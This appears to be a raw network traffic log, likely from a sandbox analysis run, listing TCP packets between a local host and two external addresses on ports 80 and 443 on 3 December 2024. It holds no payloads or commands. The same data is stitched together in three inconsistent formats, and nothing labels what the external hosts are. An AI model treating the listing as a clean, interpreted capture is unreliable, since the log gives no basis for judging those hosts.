Dec 3, 2024 14:00:57.264806032 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.264847040 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.264926910 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.273122072 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.273169041 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.273240089 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.273272991 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.281805038 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.281872988 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.281929970 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.281965971 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.290163994 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.290271997 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.290319920 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:00:57.290359020 CET | 49166 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:00:57.298662901 CET | 80 | 49166 | 142.93.65.161 | 192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.298712015 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.298747063 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.298779964 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.306281090 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.306320906 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.306386948 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.306418896 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.314505100 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.314558983 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.314719915 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.314753056 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.321611881 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.321669102 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.321722984 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.321759939 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.363738060 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.363821030 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.363825083 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.363856077 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.453038931 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.453072071 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.453788996 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.453844070 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.453886032 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.453918934 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.456300974 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.456346989 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.456412077 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.456446886 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.461669922 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.461744070 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.461798906 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.461838007 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.467113972 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.467185020 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.467204094 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.467240095 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.472079992 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.472142935 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.472191095 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.472225904 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.477303028 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.477370024 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.477400064 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.477442026 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.482661963 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.482723951 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.482845068 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.482881069 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.487855911 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.487916946 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.488010883 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.488048077 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.493020058 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.493073940 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.493180037 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.493216991 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.498290062 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.498358965 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.498389006 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.498425961 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.501919031 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.501977921 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.502022028 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.502060890 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.505891085 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.505959988 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.506028891 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.506063938 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.509243965 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.509315014 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.509430885 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.509474039 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.512989998 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.513053894 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.513149023 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.513187885 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.516613960 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.516661882 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.516735077 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.516769886 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.520276070 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.520354986 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.520406961 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.520450115 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.523874044 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.523941040 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.523976088 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.524013042 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:58.003259897 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:58.003299952 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:58.003357887 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:58.013649940 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:58.013662100 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:59.643336058 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:59.643434048 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:59.648492098 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:59.648505926 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:59.648859978 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:59.650238037 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:59.739412069 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:59.783338070 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:00.345050097 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:00.345129967 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:00.345139980 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:00.345176935 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:00.346448898 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:00.346467018 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:00.358762980 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:00.478981018 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:00.479095936 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:00.479321003 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:00.599334002 CET8049168142.93.65.161192.168.2.22
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Dec 3, 2024 14:01:01.566916943 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.567075968 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.567148924 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.567162037 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.567249060 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.567646980 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.567682981 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.568005085 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.568017006 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.568036079 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.568048000 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.568070889 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.568070889 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.568681002 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.568696022 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.568713903 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.568715096 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.568730116 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.568742037 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.572952032 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.687355042 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.687403917 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.687515020 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.758100033 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.758187056 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.758290052 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.762271881 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.762382984 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.762435913 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.770734072 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.770802975 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.770812035 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.770863056 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.779186010 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.779335976 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.779385090 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.787668943 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.787720919 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.787918091 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.787955999 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.796468019 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.796535969 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.796554089 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.796592951 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.804374933 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.804472923 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.804529905 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.812840939 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.812972069 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.813029051 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.821310043 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.821423054 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.821508884 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.830010891 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.830168962 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.830229998 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.837378979 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.837441921 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.837500095 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.950181961 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.950269938 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.950324059 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.953975916 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.954036951 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.954190016 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.954231977 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.961733103 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.961808920 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.961848021 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.969424009 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.969530106 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.969575882 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.974409103 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.974546909 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.974602938 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.979147911 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.979347944 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.979409933 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.983932018 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.984036922 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.984072924 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.988719940 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.988989115 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.989038944 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.993537903 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.993666887 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.993716002 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:01.998234034 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.998348951 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:01.998404026 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.003026009 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.003106117 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.003160954 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.007981062 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.008080959 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.008133888 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.012587070 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.012655973 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.012705088 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.017297983 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.017416000 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.017457962 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.022152901 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.022250891 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.022300959 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.026819944 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.026976109 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.027030945 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.031624079 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.031713009 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.031766891 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.036833048 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.037055016 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.037120104 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.041261911 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.041311979 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.041328907 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.041601896 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.044420004 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.142002106 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.142098904 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.142174959 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.144207954 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.144298077 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.144306898 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.147742033 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.147821903 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.147865057 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.147875071 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.147897005 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.152179956 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.152355909 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.152379990 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.152412891 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.156748056 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.156817913 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.156872034 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.161014080 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.161303043 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.161362886 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.164931059 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.165079117 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.165137053 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.169261932 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.169394970 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.169456005 CET  49168        80         192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:02.172827005 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.172997952 CET  80           49168      142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:02.173068047 CET  49168        80         192.168.2.22   142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.176609039 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.176744938 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.176805973 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.180476904 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.180623055 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.180691957 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.184129953 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.184207916 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.184305906 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.187875986 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.187936068 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.188069105 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.188112020 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.191795111 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.192008018 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.192049980 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.195837021 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.195885897 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.195967913 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.196005106 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.199233055 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.199280977 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.199354887 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.199394941 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.203320980 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.203370094 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.203424931 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.203471899 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.206718922 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.206867933 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.206917048 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.210426092 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.210550070 CET8049168142.93.65.161192.168.2.22
